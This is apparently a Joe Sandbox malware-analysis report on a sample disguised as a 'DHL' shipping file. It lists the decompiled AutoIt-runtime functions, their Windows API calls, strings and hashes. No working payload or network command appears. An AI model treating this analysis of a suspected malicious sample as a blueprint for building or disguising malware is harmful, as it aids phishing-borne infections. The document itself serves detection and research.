SendMessageW.USER32(?,00001308,?,00000000), ref: 0090C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0090C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0090CAED

Part of subcall function 008D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D2036,?,00000000,?,?,?,?,008D16CB,00000000,?), ref: 008D1B9A

SendMessageW.USER32(?,00001053), ref: 0090CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0090CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0090CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0090CB62

Strings

0, xrefs: 0090C981

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: af33d9202f7365fdb8ecc5c7800e99a30f15b88fa7448cb7c38a38f3aa8d3ec9
Instruction ID: f117a8a25a8bc8de41c686653e7b51e1a6f00ca19391c773ad23a60acdf92979
Opcode Fuzzy Hash: af33d9202f7365fdb8ecc5c7800e99a30f15b88fa7448cb7c38a38f3aa8d3ec9
Instruction Fuzzy Hash: A012CE70614205EFCB20CF24C884BA9B7E9FF55311F5446AAF899DB2A2C731EC42DB91

Function 009477BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009477F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009478B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009478EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00947900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00947946
GetClientRect.USER32(00000000,?), ref: 00947952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00947996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009479A5
GetStockObject.GDI32(00000011), ref: 009479B5
SelectObject.GDI32(00000000,00000000), ref: 009479B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009479C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009479D2
DeleteDC.GDI32(00000000), ref: 009479DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00947A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00947A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00947A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00947A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00947A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00947AAE
GetStockObject.GDI32(00000011), ref: 00947AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00947AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00947ACE

Strings

static, xrefs: 00947990, 00947AA8
AutoIt v3, xrefs: 0094793E
msctls_progress32, xrefs: 00947A4F
DISPLAY, xrefs: 0094799B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c268b8557b2c078596d30ff40176254f01e2d80fbac64fe1979f29636b4a1353
Instruction ID: 8045a95c8ead72def2d9bc710f13bc0a7e067212290fc11dbcc2533ad7dbac21
Opcode Fuzzy Hash: c268b8557b2c078596d30ff40176254f01e2d80fbac64fe1979f29636b4a1353
Instruction Fuzzy Hash: 66A1A371A14209BFEB14DBA9DD4AFAEBBB9EB44711F004215FA14E72E0D770AD00DB60

Function 0093AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0093AF89
GetDriveTypeW.KERNEL32(?,0095FAC0,?,\\.\,0095F910), ref: 0093B066
SetErrorMode.KERNEL32(00000000,0095FAC0,?,\\.\,0095F910), ref: 0093B1C4

Strings

Virtual, xrefs: 0093B18C
1394, xrefs: 0093B146
ATA, xrefs: 0093B13F
Removable, xrefs: 0093B0B8
\\.\, xrefs: 0093AFDB
RAMDisk, xrefs: 0093B090
SATA, xrefs: 0093B177
CDROM, xrefs: 0093B09A
SSA, xrefs: 0093B14D
Fibre, xrefs: 0093B154
iSCSI, xrefs: 0093B169
SAS, xrefs: 0093B170
SCSI, xrefs: 0093B131
MMC, xrefs: 0093B185
PhysicalDrive, xrefs: 0093B012
FileBackedVirtual, xrefs: 0093B193
USB, xrefs: 0093B15B
RAID, xrefs: 0093B162
SSD, xrefs: 0093B0F1
Fixed, xrefs: 0093B0AE
Network, xrefs: 0093B0A4
Unknown, xrefs: 0093B086, 0093B12A
ATAPI, xrefs: 0093B138

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 7811f7c740c75b85875d7496a2d3d503c138f0d21fe5120d55d558cfcd1c6ef3
Instruction ID: ab0c40183cc1af8bb741d6ec0a205953adc310cc943e20fba3b795207c898bb3
Opcode Fuzzy Hash: 7811f7c740c75b85875d7496a2d3d503c138f0d21fe5120d55d558cfcd1c6ef3
Instruction Fuzzy Hash: 9351E330A88305ABDB04EB94C9A297D73B1FB94345F204517E60AE7390D7B9AD01EF83

Function 008D6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 008D6A91
__wcsnicmp.LIBCMT ref: 008D6AA9
__wcsnicmp.LIBCMT ref: 008D6AC1
__wcsnicmp.LIBCMT ref: 008D6AD9
__wcsnicmp.LIBCMT ref: 008D6AF1
__wcsnicmp.LIBCMT ref: 008D6B09
__wcsnicmp.LIBCMT ref: 008D6B21
__wcsnicmp.LIBCMT ref: 008D6B35
__wcsnicmp.LIBCMT ref: 008D6B76
__wcsnicmp.LIBCMT ref: 008D6B8A
__wcsnicmp.LIBCMT ref: 008D6B9E
__wcsnicmp.LIBCMT ref: 008D6BB2

Strings

#include-once, xrefs: 008D6AEB
#comments-end, xrefs: 008D6B98
#include, xrefs: 008D6B03
Bad directive syntax error, xrefs: 0090E743
#requireadmin, xrefs: 008D6ABB
#ce, xrefs: 008D6BAC
#pragma compile, xrefs: 008D6A8B
Cannot parse #include, xrefs: 0090E819
Unterminated group of comments, xrefs: 0090E82C
#notrayicon, xrefs: 008D6AA3
#comments-start, xrefs: 008D6B1B, 008D6B70
#OnAutoItStartRegister, xrefs: 008D6AD3
#cs, xrefs: 008D6B2F, 008D6B84

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: e708b5eeeef97007137804dca86a76b1202bdd8651e95803ac95690346c0021f
Instruction ID: dc570d1deb418c4218636993bbf8975c8bc3703acf3dcf58fe2fa4f01bc4b2a8
Opcode Fuzzy Hash: e708b5eeeef97007137804dca86a76b1202bdd8651e95803ac95690346c0021f
Instruction Fuzzy Hash: 888129B0600619BACB20AB75CC92FBE7758FF10714F044127FE46EA2C2FB60DA55C692

Function 00959C8B Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00959D41
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00959DFA
SendMessageW.USER32(?,00001102,00000002,?), ref: 00959E16

Strings

0, xrefs: 00959E53

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
Instruction ID: b0ea67a6530c1d16cb4f81f57b9da02440bbb21267c769ed96221b2d141ed541
Opcode Fuzzy Hash: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
Instruction Fuzzy Hash: 5F02F130118301AFE715CF26C859BAABBE9FF49316F048A2DFC95D62A1C734D948DB52

Function 0095AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0095AB99
SetTextColor.GDI32(?,?), ref: 0095AB9D
GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
GetSysColor.USER32(0000000F), ref: 0095ABBE
CreateSolidBrush.GDI32(?), ref: 0095ABC3
GetSysColor.USER32(00000011), ref: 0095ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
SelectObject.GDI32(?,00000000), ref: 0095ABFA
SetBkColor.GDI32(?,00000000), ref: 0095AC03
SelectObject.GDI32(?,?), ref: 0095AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0095ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0095ACEC
DrawFocusRect.USER32(?,?), ref: 0095ACF7
GetSysColor.USER32(00000011), ref: 0095AD05
SetTextColor.GDI32(?,00000000), ref: 0095AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0095AD21
SelectObject.GDI32(?,0095A869), ref: 0095AD38
DeleteObject.GDI32(?), ref: 0095AD43
SelectObject.GDI32(?,?), ref: 0095AD49
DeleteObject.GDI32(?), ref: 0095AD4E
SetTextColor.GDI32(?,?), ref: 0095AD54
SetBkColor.GDI32(?,?), ref: 0095AD5E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 55a14458e56c1d65bb0d86bc7091455ddcdbb27646c82dbd9af5a568b53f367f
Instruction ID: b3833a80cb817223c5a85b8f6b63534b056184bc0ab89a9ad6c3b018fea8afa4
Opcode Fuzzy Hash: 55a14458e56c1d65bb0d86bc7091455ddcdbb27646c82dbd9af5a568b53f367f
Instruction Fuzzy Hash: 8C616C71904218EFDF11DFAADC48EAE7BB9EB08332F104225F915AB2A1D6759940DB90

Function 00958C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00958D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958D45
CharNextW.USER32(0000014E), ref: 00958D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00958DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00958DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00958DF9
SetWindowTextW.USER32(?,0000014E), ref: 00958E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00958E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00958E8C
_memset.LIBCMT ref: 00958EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00958EFA
_memset.LIBCMT ref: 00958F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00958F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00958FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00959088
InvalidateRect.USER32(?,00000000,00000001), ref: 009590AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009590F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00959121
DrawMenuBar.USER32(?), ref: 00959130
SetWindowTextW.USER32(?,0000014E), ref: 00959158

Strings

0, xrefs: 009590C2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 601d3c2e5db4fa55a35d9476cf2a53e462e89f1cc188c5d1610430bc88223149
Instruction ID: 732caf5ba85c43e1ad41390708ab91a5d2b5e91e0d09f95d7caec8c874384ead
Opcode Fuzzy Hash: 601d3c2e5db4fa55a35d9476cf2a53e462e89f1cc188c5d1610430bc88223149
Instruction Fuzzy Hash: 66E1A070905219AADF20DF66CC88EEF7BB9EF05311F008159FD15AA291DB348A89DF60

Function 00954B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00954C51
GetDesktopWindow.USER32 ref: 00954C66
GetWindowRect.USER32(00000000), ref: 00954C6D
GetWindowLongW.USER32(?,000000F0), ref: 00954CCF
DestroyWindow.USER32(?), ref: 00954CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00954D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00954D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00954D68
SendMessageW.USER32(?,00000421,?,?), ref: 00954D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00954D90
IsWindowVisible.USER32(?), ref: 00954DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00954DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00954DDF
GetWindowRect.USER32(?,?), ref: 00954DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00954E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00954E37
CopyRect.USER32(?,?), ref: 00954E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00954EB9

Strings

tooltips_class32, xrefs: 00954D1D
(, xrefs: 00954E2A
0, xrefs: 00954BFC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
Instruction ID: d9c4f25edf634ffadafb2ab9057b5922c9d1c056e189e4cd36d88db2b118e51f
Opcode Fuzzy Hash: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
Instruction Fuzzy Hash: 72B19E71618341AFDB44DF26C849B6ABBE4FF84315F008A1DF9999B2A1D770EC48CB52

Function 009346D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 009346E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0093470E
_wcscpy.LIBCMT ref: 0093473C
_wcscmp.LIBCMT ref: 00934747
_wcscat.LIBCMT ref: 0093475D
_wcsstr.LIBCMT ref: 00934768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00934784
_wcscat.LIBCMT ref: 009347CD
_wcscat.LIBCMT ref: 009347D4
_wcsncpy.LIBCMT ref: 009347FF

Strings

%u.%u.%u.%u, xrefs: 00934862
DefaultLangCodepage, xrefs: 009347E7
04090000, xrefs: 009347BA
StringFileInfo\, xrefs: 00934757
\VarFileInfo\Translation, xrefs: 0093477C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: fd17c81ba948fcefc6344d26377a4d88f69006e00a799f13d87389b9410517fd
Instruction ID: b753a199a91b13c1b1af369062cc9986b37228c5d64e1387a6441fcbcc57a7b8
Opcode Fuzzy Hash: fd17c81ba948fcefc6344d26377a4d88f69006e00a799f13d87389b9410517fd
Instruction Fuzzy Hash: B7412D716042087ADB10F7798C47EBF77ACEF45720F140166FA05E6182EF74AA015BA7

Function 008D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28BC
GetSystemMetrics.USER32(00000007), ref: 008D28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28EF
GetSystemMetrics.USER32(00000008), ref: 008D28F7
GetSystemMetrics.USER32(00000004), ref: 008D291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008D2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008D2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008D297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008D2990
GetClientRect.USER32(00000000,000000FF), ref: 008D29AE
GetStockObject.GDI32(00000011), ref: 008D29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 008D29D5

Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7

SetTimer.USER32(00000000,00000000,00000028,008D1256), ref: 008D29FC

Strings

AutoIt v3 GUI, xrefs: 008D2974

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c64910171c87562523890fbb1753c9b8f15c6ef5da17fa65e72f17bbcd3a8f9d
Instruction ID: 4acf832e4b44fc9ed255f9750d10602053c5b2a05c8b60ab50245472e80a560c
Opcode Fuzzy Hash: c64910171c87562523890fbb1753c9b8f15c6ef5da17fa65e72f17bbcd3a8f9d
Instruction Fuzzy Hash: A9B1AD70A1420AEFDB14DFA9CC55BAE7BB4FB18315F10822AFA15E72D0DB30A841DB50

Function 00954069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009540F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009541B6

Strings

ISSELECTED, xrefs: 009541C1
SELECT, xrefs: 00954250
SELECTALL, xrefs: 0095421D
GETTEXT, xrefs: 0095415F
VIEWCHANGE, xrefs: 00954375
GETSELECTED, xrefs: 009542E4
SELECTINVERT, xrefs: 00954286
DESELECT, xrefs: 009542A4
GETITEMCOUNT, xrefs: 00954128
FINDITEM, xrefs: 00954329
GETSUBITEMCOUNT, xrefs: 00954141
SELECTCLEAR, xrefs: 00954235
GETSELECTEDCOUNT, xrefs: 00954199

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 83d865f8299e99a9b21feda14d3fd98f6793c80894708696492e08699c2d2e1d
Instruction ID: be40cf9ed67d5b3cf2dbc72525da9a72049fc062469ba30b41e4e638a32adef6
Opcode Fuzzy Hash: 83d865f8299e99a9b21feda14d3fd98f6793c80894708696492e08699c2d2e1d
Instruction Fuzzy Hash: D8A1D1302143159FCB14FF25C951A6AB3E5FF84319F144A29F8A69B3A2DB34EC49CB52

Function 009452F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00945309
LoadCursorW.USER32(00000000,00007F8A), ref: 00945314
LoadCursorW.USER32(00000000,00007F00), ref: 0094531F
LoadCursorW.USER32(00000000,00007F03), ref: 0094532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00945335
LoadCursorW.USER32(00000000,00007F01), ref: 00945340
LoadCursorW.USER32(00000000,00007F81), ref: 0094534B
LoadCursorW.USER32(00000000,00007F88), ref: 00945356
LoadCursorW.USER32(00000000,00007F80), ref: 00945361
LoadCursorW.USER32(00000000,00007F86), ref: 0094536C
LoadCursorW.USER32(00000000,00007F83), ref: 00945377
LoadCursorW.USER32(00000000,00007F85), ref: 00945382
LoadCursorW.USER32(00000000,00007F82), ref: 0094538D
LoadCursorW.USER32(00000000,00007F84), ref: 00945398
LoadCursorW.USER32(00000000,00007F04), ref: 009453A3
LoadCursorW.USER32(00000000,00007F02), ref: 009453AE
GetCursorInfo.USER32(?), ref: 009453BE
GetLastError.KERNEL32(00000001,00000000), ref: 009453E9

Memory Dump Source

